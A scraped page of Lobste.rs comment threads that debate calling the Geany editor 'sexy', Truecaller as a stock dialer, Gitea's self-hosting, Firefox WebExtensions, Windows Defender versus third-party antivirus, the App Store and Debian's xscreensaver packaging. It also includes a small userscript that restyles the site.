-
I’m pretty uncomfortable with calling software “sexy”.
-
Agreed. And going to a website promoting ostensibly professional software only to see “sexy” in large type multiple times just doesn’t feel work appropriate.
“the little sweet and sexy” is just not a phrase you should be using to describe software. It’s off-putting to people, and it’s generally (at least in pop culture) used by leachers old men.This feels like yet another example of how tone deaf men in tech can be.
-
Glad to you took the time to insult and signal how much better you are than those leacher, tone deaf old men who wrote some free software for you. It’s really a great way to earn friends and show them the errors of their ways by shaming people publicly. /s
p.s. I agree with the sentiment, and hwayne’s comment is far more appropriate than some of the others I have seen. He expresses his own opinion, not theoretical opinions of others, and doesn’t shame anyone.
p.p.s The funny thing Is rereading my own comment, I see I am not even following my own advice! A better comment would be something like:
I do not agree with calling potentially well meaning people “tone deaf”.
-
-
Same for me, but that’s probably the sign of times. I have also the same feeling when people say that they love this company or that software.
Of course when old established projects use such a lingo it may sound like when old people say something in teenage slang. It will feel off for teenagers and alien to other old people. Sort of uncanny valley?
-
-
It may be because I’m not a native English speaker. In my language love is mostly reserved to the top emotion. Then if you love something (your work or music genere) it means that it can literally compete with the feeling you have to e.g. your spouse. I guess it’s something that I can’t get over. Especially regarding purely profit motivated endeavours.
-
Almost certainly a native/non-native speaker thing. In American English at least, ‘love’ is a pretty tame word that gets thrown around for everything. There really isn’t a specific word distinct for, e.g., the feeling one feels about their spouse; about their kids; etc. Usually ‘love’ is used there too, and context determines the level of effect.
Occasionally you might see modifiers like, “brotherly love”, “fatherly love”, “familial love”, etc. That’s not super common though, mostly just context to delineate the quality of the usage.
What is your native language? I know Greek has a few different words for different classes of ‘love’, and I imagine it’s not super uncommon, but I’m always curious about language related topics and the different quirks various languages have.
-
I’m Polish. We say something like “brotherly love” or “fatherly love”. One can love their work, hobby and certainly their pet. But when someone says that he loves food or a thing it sound strange. “Like” is “lubić”. “Love” is “kochać”. “Love” in context of things would be more commonly translated to “uwielbiać”. It literally means “worship”, but in this context it is really more like “love” used as “stronger than like”. So maybe it is more crazy then in English.
Love as a verb is “kochać”. But love as a noun is “miłość”. So “kochać” means that you feel “miłość” to somebody.
I heard people from more pop part of younger generation saying such things, but it sounds for me like a literal translation from English. I heard it in movies and especially children movies. It almost always sounded off to me, but next generation is learning this foreign use. So I guess I’m doomed thanks to globalization ;).
-
I’m also Polish and to be honest I find nothing strange in usage of “love” in context of “food or a thing” (both in Polish and in English). Considering that it seems from your linkedin profile that I’m older (32) than you I think your generalizations about younger generation is wrong :)
-
-
-
-
-
-
Yes. Also: laptops, companies, fields of study, consumer electronics, genres of literature, fonts, cooking techniques…
Unless you are literally indicating sexual attractiveness, please use a word such as “exciting”, “sleek”, or “fashionable”.
-
I don’t think I have a problem with the sexy part, I have a problem with the screenshots make it not even look all that great. Those fonts are terrible. There’s nothing in the feature list that really even makes me want to try it out over the editors/IDEs I currently use.
-
I filed an issue. Please consider +1
-
-
-
-
Yes, sexy is gender neutral. What makes it potentially offensive to women is the association with exploitation and objectification.
The word itself isn’t offensive. I can say that I find my wife to be drop dead sexy, but that’s because in that context it’s entirely appropriate.
-
-
-
Fascinating that you see it that way. When there is a gigantic groundswell of people saying “your behavior makes me uncomfortable” I try to change that behavior.
I for one value women in tech. I find their presence in my day to day working life improves my productivity and the productivity of the teams I work on, as does a diversity of backgrounds, opinions and characteristics.
So, for me this isn’t about offense, it’s about trying to make the industry I care deeply about a more welcoming place for a group of people I also care deeply about.
-
Folks can play dumb about “sexy” alone, but when you address the complete phrase, “little, sweet, and sexy,” someone’s gotta be pretending to be reeeal oblivious to show up and say oh that’s neutral we’re not talking about software like we wanna talk about women.
Anyway keep speaking up, because yeah it’s not “taking offense on behalf of others” its paying attention to them and having consideration without them having to speak every time. And I sure as heck don’t like to wade directly into this kind of talk on lobsters very often, it’s rarely worth it.
-
Thanks. I think that’s why it’s important for people in privileged situations like myself to at least try and raise awareness. I don’t let the negative comments get to me - I was donning my asbestos underwear and wading into email/USENET threads before most of these people were born :)
-
I can’t imagine people talking about women that way. Would be super creepy to use a phrase like “sweet and sexy” about a person instead of a thing…
-
Maybe you are (or someone reading this is) not aware of the counter argument so I thought I’d share: the implication in your comment is that sex necessarily exploits women, which is false. The idea that sex necessarily exploits women reinforces the belief that we must protect women from sex as we do children. This is a defining aspect of anti-sex, Third Wave feminism, which I believe runs counter to the feminist goals of dismantaling fascist and patriarchal structures in society.
-
-
I am very rarely seeing a groundswell of people saying “Your behavior makes me uncomfortable”.
What I actually see is people saying “I assume your behavior is making somebody else uncomfortable, and I am taking the credit for ‘fixing’ you”. I far prefer the original comment from hwayne where he was talking about his own opinions, rather than imagining those of other people.
-
My upvotes usually mean “you speak for me also”. It’s quite a time saver. :) So, to clarify, I myself personally was made uncomfortable by someone describing software as “sweet and sexy”. So much so that I only skimmed the first page or so and closed the tab.
I assume they had good intentions. If I were the author, I’d work a bit more to come up with some way to express my excitement at having written something cool, without sounding creepy.
-
-
-
I for one value women in tech. I find their presence in my day to day working life improves my productivity and the productivity of the teams I work on, as does a diversity of backgrounds, opinions and characteristics.
Non-native English speaker here. How does the term
sexyoffend only women and make them unwelcome to OSS? I mean, I understand the top comment (by hwayne) here saying how it would make someone uncomfortable, but why I don’t understand why it is only limited to women.-
Quoting a woman who’s a friend of mine from another context, unattributed at her request:
The word “sexy” when used to mean that something is sexually attractive, is what it is. You may or may not be expressing something offensive when you use it. The word “sexy” when used to describe something that is not sexual - a car, an algorithm, a user interface - still evokes the idea of sex. It implies that you should feel sexually “turned on” by it, even if it is not literally a thing with which you would have sex. Given the cultural and historical context of our times, a professional environment where people are expected to feel sexually “turned on” by things, or where the idea of sex is constantly referred to when it is not technically relevant, is not an environment where many women will assume they are respected or even safe. You personally might go ahead and assume you are safe and respected. Many women won’t. This reduces the pool of women who are interested in applying for jobs at your company, or interested in staying once they have experienced it for awhile. The people who create the culture of a company either care about that, or they don’t.
-
-
-
-
-
-
-
-
-
For those who are about to read: note that geany.sexy is not managed by the maintainers of the Geany IDE, so the issue didn’t end up going anywhere.
-
-
-
-
-
meredith
1 year ago
|
link
| on:
Something is wrong when the ‘telephone app’ on your phone becomes 3rd party
This is pretty gross to drop on your users. Truecaller is cool if people know they’re opting in, and have a plain dialer available, but not as the stock system app, especially switched in during an update.
Also if spam call blocking is enabled by default, TC’s users are very passionate with spam flags and in my experience have caused things like bank anti-fraud checks to be blocked.
They said users get 90 days of “pro” for free, then presumably the ads come back on, and Truecaller is extra annoying because it has “draw on top” permission and doesn’t only have ads inside the app, or in notifications, but puts them in a popup window over your other stuff.
-
meredith
edited
1 year ago
|
link
| on:
20,000 Worldclass University Lectures Made Illegal, So We Irrevocably Mirrored Them
“made illegal” my ass, and any sort of framing like disabled people are party poopers for this sort of thing: get fucked
-
Completely agree, and the people behind this mirroring seemed to miss the point entirely.
The content wasn’t “made illegal”. The illegal part was for a public, tax funded institution to release it without meeting the requirements of ADA. Nobody’s taking down MIT’s OpenCourseWare videos, because they actually followed the law and put captioning on theirs.
It really wouldn’t surprise me if this gets a DMCA take down notice or something like that, because mirroring it really doesn’t change the fact that it came from Berkley without the legally required captions.
-
-
-
It wasn’t legal for a public institution to release it without captions. CC allows you to re-distribute, maybe getting rid of captions, and i don’t believe there’s an obligation to stay ADA compliant if it’s a private (rather than state) resource.
Now, it would be great to see an effort to get all of these captioned as well, but them not being deleted is a first step towards this.
-
-
-
-
I agree with the sentiment, but maybe be a bit politer than just raging?
-
This is called tone policing.
-
-
-
Disagree. Original post was:
“made illegal” my ass, and any sort of framing like disabled people are party poopers for this sort of thing: get fucked
This can be paraphrased (slightly) as:
This makes me angry, and fuck anybody who says the disabled people are being party poopers.
That’s an opinion and an imperative. There is no “This makes me angry (because of reasons x, y z). There is no "fuck anybody (and here’s what that policy would look like)”.
It’s a yelp of anger that gets upvotes for the emotion and not the content. There isn’t anything to engage with as it’s just an unsupported opinion, and not a terribly articulate or nuanced one at that.
This sort of thing is shitposting.
-
-
-
-
-
-
-
I find it somewhat telling that they aren’t dogfooding.
If your project is all about hosting code repos and you don’t host your own code, something is wrong.
-
If they were doing that “just cuz,” I’d agree with you, but the fact they have a thorough list of what they need to self-host, plus my own experiences working on Kiln, make me give them the benefit of the doubt.
When I was working on Kiln, I was constantly pushing for self-hosting, way before the product was “ready,” for the exact reason you’re pointing out: we should put our money where our mouth was. And I won that fight pretty early, when we were right around the level of features Gitea 1.0 or 1.1, albeit with a less-polished UI. My theory was that going to the product even before we hit our minimal internal viable product (MIVP?) would help us shape those features, and that at any rate using Kiln couldn’t be worse than using bare Mercurial hosting.
Oh boy was I wrong. What actually happened was that we implemented the shittiest possible version of the missing features almost immediately so that we could get work done. I’m talking hybrid Perl/Smalltalk services running on my personal desktop busy-polling the Kiln prototype installation to generate RSS and email notifications based on hand-written rules I modified when people asked me to. I’m talking having to take time out from getting to feature completion to write a Mercurial history import rebuilder that we never would’ve had to build if we’d waited for our schema to stabilize. I’m talking shoving out a clunky ASP.NET adapter that buffered the whole Mercurial request in RAM before even starting to process the thing because it at least worked and I didn’t have time to fully wrap my head around writing a proper ISAPI plugin.
The result was we got distracted from actually making Kiln work and probably lost a month doing one-off POS versions of features we knew we’d need to build properly anyway, plus damaged a bunch of internal goodwill at Fog Creek on the quality of Kiln, plus hurt our own morale by associating our own product with being incomplete and annoying. I am not proud of that decision and would not repeat it.
We can argue a bit over some of the things Gitea throws in their MIVP bucket (becoming an OAuth provider would definitely be nice, but you could always just make an extra account and give your CI explicit login permissions), but a few key ones, like line comments on pull requests or improving the notification system, have really, really strong echoes of the situation I saw on Kiln. They’re targeting getting to self-hosting, and they know why they don’t want to go there yet. I support them waiting.
That said, I’m happily using Gitea myself and have been really pleased with its stability, UI, and upgrade story. Doing viable backups is also really easy, and abandoning it for another Git hosting option would be really, really easy, because Git. So don’t use it if you need the same features the Gitea team does, but if it’s just a light install on a non-review-heavy workload, I’d at least give it a look.
-
-
-
I don’t know. How much effort and expense is involved in standing up a $10 linode for hosting?
I mean, I understand what you’re saying, but at the same time, this seems to be solidly within their target audience. If hosting your own gogs/gitea is too hard, how well do you understand your audience?
-
Right from their own site: Hosted and sponsored by DigitalOcean
So, for the “pain” part of it: if they’re not capable of organising someone to setup their own software on a server, I’m not sure I have much faith in their ability to write said software, or their goals for it.
-
It’s not a pain to host or setup, we are providing all the infrastructure on sponsored machines, we have not started dogfooding because of the reasons mentioned above. We have also published our scripting to launch the infrastructure to be entirety open, you can find the terraform and ansible scripting at https://github.com/go-gitea/infrastructure.
-
-
-
-
Fair comment. I can only think that Gitea doesn’t yet provide some of the core functionality they need (maybe pull requests or an issue tracker?). That said, a quick glance at their website didn’t actually tell me what functionality they do provide.
Still, I do like the idea of a lighter weight self-hosted alternative to GitLab.
-
Currently we provide only parts of the stuff we expect for hosting our code on our own. Contributions must be easy for everybody who wants to contribute, that’s why we said we need specific features to start with it.
Edit: For the list of features (needs to be updated after the 1.1.0 release) just take a look at https://docs.gitea.io/en-US/#features
-
Thanks for the reply - I didn’t mean to come across as critical and apologise if I did.
I did see that list but it wasn’t detailed enough for me - it didn’t give me a comprehensive picture of Gitea’s functionality. I don’t want to have to install and configure something just to discover it’s missing a key feature I need.
That said, I’m definitely going to give it a try - I’d been eyeing Gogs for quite a while before the fork.
-
As a result of this we have extended the feature list now: https://github.com/go-gitea/docs/pull/99
-
To discover more than just the key features it’s much easier to follow the button in the middle of https://gitea.io/en-US/, there you will get to https://try.gitea.io to play around with it, no need to install anything ;)
Edit: https://try.gitea.io is always running on the latest version from the master branch.
-
-
-
-
-
Well, it’s certainly not for speed. I now have beat as part of keyboard shortcuts. For example,
ctrl-fbeat to search in the page, because there’s a 200-800ms pause between me typingctrl-fand when the search box is open and accepting keystrokes. Same for focusing the location bar, etc.But really, I think it’s inertia. It’s not that the extensions I rely on don’t have equivalents in Chrome, it’s that I’ve installed them and tweaked them over the last dozen years of using Firefox and I’m used to them. If I suddenly lose my favorites like Tree-Style Tab, I’m going to stand up and look around seriously for the first time since I switched from Mozilla to Firefox 1.0.
This is why retailers like Target spend insane amounts of money on invasive, creepy things like figuring out when teenagers are pregnant. Having a kid is one of the handful of events that causes shoppers to radically change their buying habits and Target wants to become part of a new routine that will last for decades. Decisions aren’t free, so humans don’t constantly re-evaluate all their options to pick the best one. After we make a decision we coast indefinitely until something pushes us to re-evaluate.
The author keeps hearing people stay for extensions because they do. When WebExtensions rolls out and suddenly a comfortable, familiar extension disappears out from under me I’m going to be seriously annoyed at having part of my very personal config deleted for zero apparent value and I’m going to have to look around to find a replacement. I’m trying to imagine a similar offline scenario and all I can come up with is a mall salesman deliberately spilling wine on my shirt before trying to sell me a new one when I have plenty of other vendors available.
Also, speaking of value, has anyone ever articulated a single end-user value to WebExtensions? I look at Mozilla’s writeup and MDN and it’s all “WebExtensions are a cross-browser system for developing browser add-ons” and why would I give a damn? I use Firefox, those other browsers may as well not exist. The only user-visible change of WebExtensions is “a bunch of your extensions stop working and can never be fixed”. Gee, thanks! (I guess the wiki page says “should maintain acceptable security and privacy standards” but that’s never elaborated on and, paranoid as I am, I haven’t felt a lack of security and privacy because of my extensions.)
There’s an old saying, “don’t piss on my shoes and tell me its raining”. This feels more like “don’t piss on my shoes and tell me it’s raining and then offer to sell me shoes and also mention that you’ve lowered the quality to match that of the other vendors who are standing right over there”.
-
The user-facing value is performance.
Firefox can’t compete on perf right now - by limiting the interface extensions get access to they can make a lot of optimizations which are currently impossible.
-
I keep hearing this statement and have no idea what recent data it is based on.
Certainly when I measure it (and I do, because some of my apps need to run on seriously underpowered set-top boxes), Chrome is substantially slower.
I understand and accept how Chrome is safer with sandboxing, but I just can’t seem able to observe this speed advantage so many others others do.
-
Vanilla firefox is plenty fast.
Install a few extensions, and things change pretty quickly.
For instance, Adblock Plus is astonishingly slow, as is the lastpass extension.
-
Chrome is substantially slower
Subjectively, Firefox feels quite a bit slower than Chrome on the same hardware (in my case, my MBP running OS X). This is with a fairly stripped down Firefox - only a few basic plugins like https Anywhere, uBlock Origin, etc. Chrome has all of those plus a whole bundle more but it still feels faster.
As a matter of interest, what platform are you testing on and what performance difference have you measured?
-
Most of our tests were done on RaspberryPi2. We ran sunspider benchmark which executed in 2819ms in at that time reasonably recent Chromium and in 2102ms on no more recent Iceweasel (basically Firefox).
We also made tests of our app (SPA compiled from Typescript) results of which I can’t find at the moment. What we were interested was how quickly our app becomes operational which is heavily influenced by Parse/Compile cycle of Javascript and how it behaves afterwards which where Javascript engine performance has larger impact than pretty much anything else. I remember Iceweasel being noticeably faster, but I don’t remember the details.
At the end it didn’t matter much since we usually don’t have a choice of what browser to run and most set-top boxes run a bastardized version of some old webkit on a hardware that often doesn’t include GPU. So you have to live with what is there.
At the end it also doesn’t matter if Firefox is actually faster, if Chrome better handles perception of it. As a user I am not browsing with a stopwatch in hand and will use whatever feels more pleasant.
-
-
-
-
Well, it’s certainly not for speed. I now have beat as part of keyboard shortcuts. For example, ctrl-f beat to search in the page, because there’s a 200-800ms pause between me typing ctrl-f and when the search box is open and accepting keystrokes. Same for focusing the location bar, etc.
Is it on a Mac, by any chance?
-
Since pushcx said ctrl, I’m guessing it’s not on a Mac. I’m on a 2015 MBP and cmd-f is practically instant for me, also “
/” because I use vimperator’s search more. Vimp and Tree Style Tab are probably the heaviest extensions I run. This is the same kit I run on Windows and Linux and I can’t say I’ve noticed any search lag on them, but again I don’t use ctrl-f on the reg. -
-
-
-
Will need to read more on this, are we really at the point that windows defender is all you need? Seems like bad advice to turn off all A/V.
-
I think it boils down to this: you’re safe (and don’t need AV), or you’re not safe and and AV can’t save you.
If you’re running evil.jpg.exe attachments and downloading applications from P2P networks or other sketchy sources (or not checking signatures, hashes, certificates), running unpatched software or shit software in general, etcetra, then you’re in trouble and while AV could save you from some, it simultaneously opens up more avenues for attack. And the malware is constantly changing, so windows where they bypass the AV’s heurestics are likely; or you’ve got overzealous AV with too many false positives and you learn to disable it or otherwise work around it to run all the things that could or could not harm you…
Otherwise, your system is up to date, you check your sources and only use reputable stuff (+ don’t run a lot of unnecessary junk to begin with), then you’re probably not getting malware. You might still be vulnerable to undisclosed zero days, but I’m not convinced AV can actually protect you from them. So you don’t really need AV.
Unfortunately a lot of people end up being in some sort of middle ground where they can’t verify all the things they receive. That’s a tough place to be, but having a basic AV (that doesn’t open up more vulnerabilities) could save you from trouble. In the end, your best bet is to keep the important stuff on another machine.
-
-
When I used Windows, we did a combination of HIPS and sandboxing. That was often DefenseWall + SandboxIE. Another one substituted for DefenseWall in many cases. Can’t recall its name. Such measures were better than anti-virus since they prevented the problems the antivirus caused. Also, so little uptake of them that malware authors weren’t targeting bypasses at them. I doubt that changed.
Oh yeah: don’t forget NoScript and HTTPS Everywhere. NoScript still saves me bandwidth & page load time. Unless I have to twiddle with it to get the right script among 20+. (rolls eyes) (curses site developers)
-
-
Unfortunately a lot of people end up being in some sort of middle ground where they can’t verify all the things they receive. That’s a tough place to be, but having a basic AV (that doesn’t open up more vulnerabilities) could save you from trouble. In the end, your best bet is to keep the important stuff on another machine.
I think that’s the problem area. Email is such a common attack vector these days and malware attacks are getting more and more sophisticated, with even more technically savvy users being caught. I find that ClamAV mail scanning catches a lot (I host my own email), but it’s still not perfect.
FWIW, I’ve seen a few organisations move away from third party antivirus solutions towards Microsoft’s offerings over the past year or two. I’m not sure if that’s driven by cost or security though (perhaps both?). I could’ve sworn I saw it on Macs as well as Windows machines but I can’t seem to find any reference to a Microsoft antivirus product for OS X now. Hmm.
-
-
I know you already got some replies that walked in the “no AV” direction, but I want to take it back up a step here – this article suggests sticking to Windows Defender, not turning off all AV.
Plenty of security folks say Defender is solid, but maybe there’s this perception that since it’s free and bundled, and not playing out the kind of security theater and cross-product advertising that AV vendors tend to, that it’s a lesser option? I mean, Microsoft acquired good antivirus software and its team, and is improving and maintaining it and not turning it into a nightmare like the others.
I think we, People of the Nerd Forums, may need to keep talking up Defender to get rid of whatever stigma there is. The important takeaway from the article is to turn off crap AV, not all.
-
-
Signatures in AV nowadays are not only based on hashes of the file. They can also check what API your malware uses in runtime. So, when your malware will get sampled, and if your randomization function only consists of changing the encryption seed in your packer layer, there is high probablility that your sample will still be matched by the same, unchanged, signature.
Also how many AV engines have you tried? Would you want to show the link to your test on VirusTotal?
-
-
-
I work in a somewhat AV’s related position and get to see AV’s verdict on many digests each day (Mostly AdWare / PUA). From my experience, Windows Defender is nothing close to good commercial AVs. It simply doesn’t cover as much ground and is often shipping signature for broad campaign quite late if at all. Personnaly, I rather like ESET-nod32 or MalwareBytes engine and they are mostly the one I rely on to have a clue if a file is bad or not.
My issue with this article is that it doesn’t specify who it targets. I think most people here are more tech savvy than the general populace and have good habits to not download and run random executable. Most people here probably doesn’t even run Windows outside of VMs… Defender is probably a nice default that doesn’t get in the way.
However, I don’t think I would probably recommend a family computer used by the kids to download free games and used by the parents for financial transaction with Defender alone. Also apply to a corporate network where good AVs can at least pick up on the basic phishing and broad targetting malware.
-
So the problem here is that most, by which I mean nearly all, of the AV software out there introduces more vulnerabilities than they patch. They wreak havoc in well written codebases opening holes in the browser and email applications faster than the those applications can close them.
If you want to make a case for AV you are going to have to show how much value they add that outweighs the swathe of destruction they create while doing so. It’s no longer acceptable for someone to inject themselves into every process on a machine doing who knows what, increasing the attack surface for all of those apps as well as violating the principles that make something like TLS a secure transport.
The evidence is clear that the majority of the Vendors have been very bad actors. There is little evidence that they provide any real value.
-
-
-
I’ve only had AMPs come up in search results a few times, but it has literally never worked for me. I just get failure pages on Firefox Android + ublock o, so it’s become an indicator of something to avoid if I want to get to content.
It also doesn’t seem like something I’d work too hard to target as a content publisher, either… I’d rather just take responsibility for good mobile experiences.
-
same. AMP literally just doesn’t work for me at all. I have to go reload google in desktop mode for it to even be usable. i’m legitimately tempted to switch to Bing at this point to avoid it.
-
-
I don’t mind Windows, and I don’t really have dealings with current PHP, but I understand where both have come from, how they’ve developed, and how it’s not so easy to change things so entrenched. I guess, in those regards, I respect them. I don’t think that’s such a big stretch of one’s character to achieve, so I don’t think this article is asking a whole lot of its readers. Maybe it is? I’m sure some primo devs will weigh in.
What I’m more interested in is respecting them as in don’t be a particular asshole over it, like criticizing software and technology is obviously okay but bashing and jokes and memes are elitist, as well as old and uninteresting. Some people built this, some people are happy with this, some people are taking their baby steps with this, some people only have access to this right now, et cetera, so chill.
-
Haha, how many years do I have to quietly read and occasionally post before I get cred for not being a throwaway and “knowing the community,” and participating with downvotes, which offer several reasons that aren’t about community, reasonably? It’s like actual new folks are meant to shitpost a few jokes for easy karma to get past the bar.
-
-
In fairness if you don’t comment, why you gotta downvote others' comments? Post rebuttals!
-
-
-
-
The “niche of a niche” section is dead-on for me. My resentment stems from the fact that it seems like there are hundreds of devices built for consumption, with only a handful that are made to be nice to use for creation, much less with good hardware/software synergy.
Least favorite comment about this: “oh, it’s just market economics.” I hear this (I’m admitting bias) as an economic tyranny of the majority and as prizing consumption over creation. It’s also ridiculous given the fact that Apple is one of the most successful and wealthy companies on the planet. I suspect one of the reasons OS X did so well under Steve even as the iPhone came about was the fact he had such a soft spot for NeXT.
Perhaps the developer experience of OS X was a pure anomaly, economically speaking. If so, I want to know what the next OS for developers is.
-
-
I am a kernel programmer, I have written kernel code for various kernels, both open source and proprietary. Now I write compilers. I say this to firmly put myself into your “developer” category, and to put me myself firmly out of the “GUI programmer” category.
Now, a few times in my life I had to write some GUI code. I had to use Win32 API, MFC, .NET, Delphi, GTK, QT, Tk, Cocoa/Obj-C (mac and iOS). I don’t really like to do any GUI programmer, but if I had to, and you’d make me use anything else other than Cocoa (perhaps with Swift, never tried it), I will abandon programming and start subsistence agriculture. All the other GUI toolkits make me frustrated and angry. Cocoa (plus all the tooling, Interface Builder, etc) is okay. I don’t like to do it, but it’s not too bad.
For me, this means OS X is truly great for developers.
-
-
Disagree. Linux does not provide nearly the same powerful abstractions that OSX does for application scripting.
It’s the standard problem you find with a super diverse culture - everyone has their own way of doing it, and so there’s no interoperability.
To be specific, KDE offers Kross, Gnome offers Bonobo or whatever their scripting thing is, and none of it actually works for all your applications because the average Linux user ends up using a patchwork of apps that come from various projects and distros.
-
I’ve only used OS X for about a year and a half now, when they gave me a choice at a new job and I decided to jump straight in and figure things out on the job. I’ve been pretty happy customizing and automating what I need but most of what I do just sticks to what can be done with shells or perl – I grew up on that kinda stuff. Could you tell me what sort of work you do with app automation?
-
Absolutely!
A super simple example for how I make my day to day life better using Apple’s inter-app scripting. I use Alfred: https://www.alfredapp.com/ as my launcher, so I do just about everything through it. I have it configured to control Spotify, which I frequently use to listen to music. I can turn volume up and down, and go to the next/previous track, or play/pause from anywhere on my Mac, no matter what app I’m using, because of an Alfred workflow someone wrote which sends scripting commands to Spotify to control it.
-
-
-
-
-
I browse Lobste.rs at 120% scale and Hacker News at 170%, but I know some people like the type small so that more of it fits onto one screen. The important part is that a site responds well to zoom or other text size adjustments, or at least works well under Reader View, so everyone can read the content in the way they’re most comfortable.
-
-
I do break the pixel-specified CSS here, so everything is relative to firefox’s 16px default and when I change that, it should change everywhere.
body, textarea, input, button { font-size: 100%; } li .link a { font-size: 110%; } li .byline { font-size: 90%; }While I’m mentioning ✨lobste.rs modding✨, I also shuffle things around and space them evenly when previews are enabled:
// If story previews are enabled, set regular spacing and place byline below // title. if (document.querySelector('div.story_content')) { var sheet = document.createElement('style') sheet.innerHTML = "\ ol.list li.story { height: 7.5em; } \ li.story div.byline { color: #777; } \ li.story div.byline a { color: #777; } \ li.story div.story_content { color: #999; font-size: 95%; }" document.body.appendChild(sheet) var bylines = document.querySelectorAll('div.story_content + div.byline') for (var e of bylines) { e.parentNode.insertBefore(e, e.previousElementSibling) } }That all comes out like this
-
Better have small text that’s easy for users to scale than large headlines that don’t wrap well and take ages to scroll through. In lots of ways, I think Lobste.rs and Hacker News do this best: text in simple divs, with straightforward constant sizing and no crazy wrapping techniques.
-
-
-
If you’ve not planned for this contingency, you’ve not built a business, you’ve built a product. Every business owner selling at retail considers “what if my reseller goes away”. Physical goods are harder to reroute!
Plan for failure modes, no matter how unlikely they are. It doesn’t necessarily have to be a part of your MVP, but it should come before 2.0.
-
You cannot distribute iOS apps any other way than the app store (which he points out in the post). As for macOS, Dash is already available for standalone standalone install / licensing. He even provides a link to migrating the license.
So I’m extremely curious what exactly you would suggest he do.
-
Dash’s developer has this pretty well covered for now for macOS, but I’m sure there are other developers who don’t have an alternative storefront for their software.
What if the App Store was the developer’s sole source of revenue? What liability does Apple have for messing up, if the removal was an error on their part? Should a developer have insurance for when an oversight effectively pulls their product from the shelves, even if temporarily? I think we’d like to think that the developer is always in the right in these, but generally, they’ve not been, often because they’ve misunderstood some ambiguous rule.
-
If you’re in business for yourself, and you cannot afford to be without your sole source of income, then you probably should get some insurance. In general, you should only insure against a loss you cannot afford; if you can’t survive without your income, that’s probably a good target for insurance of some kind.
-
-
-
This is what Flux did and Apple sent them a cease and desist.
-
-
-
-
-
Easier said than done. A lot of people really do depend on Apple for distribution and can’t do it themselves. Sure, they’re ‘makers of a product’ rather than ‘business owners’, but that’s a detail. The bigger point here is that Apple itself is unreliable. Its selling point is that it decreases the need to worry, and yet many developers are afraid of their apps being pulled and many consumers are afraid that their phones will crap out on them. This says more about Apple than about the dev.
-
I think you’re right in part and wrong in part.
As a person whose mortgage used to be paid - at least partially - through iOS development, yes. There was a constant worry that we’d break some small rule and Apple would pull all of our apps and we’d all be boned.
But as a consumer, I’ve never worried about using an Apple device. The hardware was reliable and quickly replaced when problems arose, and the App Store model meant I never built a relationship with software providers (and I’m sure Apple wants this to be the case ;)) so I never felt the risks the developers took.
Apple could win a lot of goodwill by improving their business practices but I’m not sure they actually care - I think iOS developers needs Apple more than Apple needs them.
-
But as a consumer, I’ve never worried about using an Apple device. The hardware was reliable and quickly replaced when problems arose, and the App Store model meant I never built a relationship with software providers (and I’m sure Apple wants this to be the case ;)) so I never felt the risks the developers took
Yes, but as with many online app stores these days you’re really just “renting” yours apps for the duration that the app is on good standing with the app store owner, as soon Apple doesn’t like something then at best you don’t get support or updates, at worst they delete it from your phone, maybe with good reason, maybe not, in some cases this can be good for a consumer, I’m sure they’ve found lots of malware for example that slipped through but Apple could remotely delete it, but in many of the headlining cases they seem to be just enforcing their arbitrary rules somewhat haphazardly and may be in the wrong.
-
But as a consumer, I’ve never worried about using an Apple device.
Maybe I’ve had a particularly bad experience, but I recently lost all my messages and photos (which were backed up by my computer and Google, respectively—thank god) due to updating to iOS 10. I was under the impression that anyone who had used Apple’s products for a while was aware that they worked fairly well but also that Apple was not nearly as close as they claimed to being the technological messiah.
-
-
-
-
OS X with lots of spaces and TotalSpaces and Witch to manage navigation.
I’ve tried a few other window management tools but none have really say right with me. I’d love something like i3/awesome/etc for Aqua windows, but haven’t found the right tool yet (suggestions are welcome!).
-
Yeah, the closest I have to tiling is using Moom explicitly – other than its default snaps I have a custom 1 and 2 position that places windows 60-40 on screen.
This past year and a half has been my first experience with a Mac at all and I tried the built-in “switch apps, then switch app windows” for about a year, I really did, but I finally got Contexts to get around.
On other systems, I use i3, or Cinnamon with some plugs to make snapping nice, or Windows with AquaSnap (I saw they added their own take on universal tabs, too!).
-
-
I’ve been a bit iffy on using it, it seems like it’s most practical when tying together several social media identities as proven, and I don’t really want there to be a definite connection between who I am across services. (I don’t necessarily want to maintain a “brand” like a lot of people in this sector do. ?) I don’t mind giving people a way to look up a key for sending me messages on each service separately though.
-
OK, except jwz says there were security fixes, which changes the equation.
Maybe I missed something, but I read this as: jwz wants to run his project as a single release stream, fixing security issues only in that stream, but the Debian maintainer apparently isn’t willing to backport fixes from that stream to Debian stable. In the bug report, the priority seems to be eliminating the popup message because it makes Debian look bad rather than figuring out how to get the security fixes into stable Debian–which really makes Debian look bad.
That doesn’t sound “wrong”, exactly. It sounds like Debian wants jwz to either do extra work to support their release model, or suffer reputational damage from having an old insecure version of his software in the distro.
-
Debian backports security fixes. The maintainer being apparently inactive is a tangential issue for which there is already an open bug.
-
I know they’re supposed to backport security fixes. I’ve based my whole company on Debian and trust them to do that. Which is why I’m disappointed that people seem to be exclusively annoyed with jwz for putting this helpful last-resort canary in the code rather than annoyed with the maintainer for being asleep at the switch.
-
I think xscreensaver has no public VCS repository, only release tarballs. This just doesn’t jive with the stable update system Debian wants to run, and I wouldn’t expect someone to honestly try to isolate security fixes from diffs between entire releases in order to backport them.
I don’t know what the policy behind the {release}-updates system is, but considering the upstream constraints and that this is a somewhat security-relevant package, maybe this should join alongside web browsers and be an evergreen package on stable releases, or, with consideration to the maintainer’s position, dropped as something untenable for stable Debian if they can’t get it on that system.
-
As I said above, it sounds like Debian wants jwz to do extra work to support their release model. If the Debian maintainer doesn’t want to put up with upstream’s dev process, it isn’t upstream’s problem, it’s Debian’s problem. If the maintainer doesn’t want to put in the effort to backport (which in this case would include making diffs) then yes, it should be dropped. Which is exactly what jwz asked for.
-
-
-
-
-
-
My last WinMo phone was the HTC HD2, which of course became nigh-legendary for the OS ports that hackers got running on it. I was pretty happy with WinMo at the time, and near the end they actually pulled together their own app store. I had licenses for FlexMail and IM+, I remember.
Anyway one of the reasons WinMo had some neat tricks that weren’t reproduced for a while on locked-down Android and iOS devices is that while there were permissions in the sense of user/admin for some things, it was essentially a big lock switch that everyone turned off and there were no granular permissions per app. This allowed the WinMo equivalent of LOADLIN for early Android efforts – an app was able to clobber the memory of the running system, and this leveraged the WinMo drivers having done some hardware initialization too.
Android brought with it those granular permissions and more standardized / blessed APIs for hardware components. This is stretching my memory a bit but I think WinMo pretty much had a different library per OEM for camera control. It also didn’t have the intents system, which makes customization more user-accessible. (Compare to switching shells by setting an exec path in a registry key.) Apps on WinMo could dig right into each other, in memory and in storage, using internals directly rather than forcing the use of defined IPC.
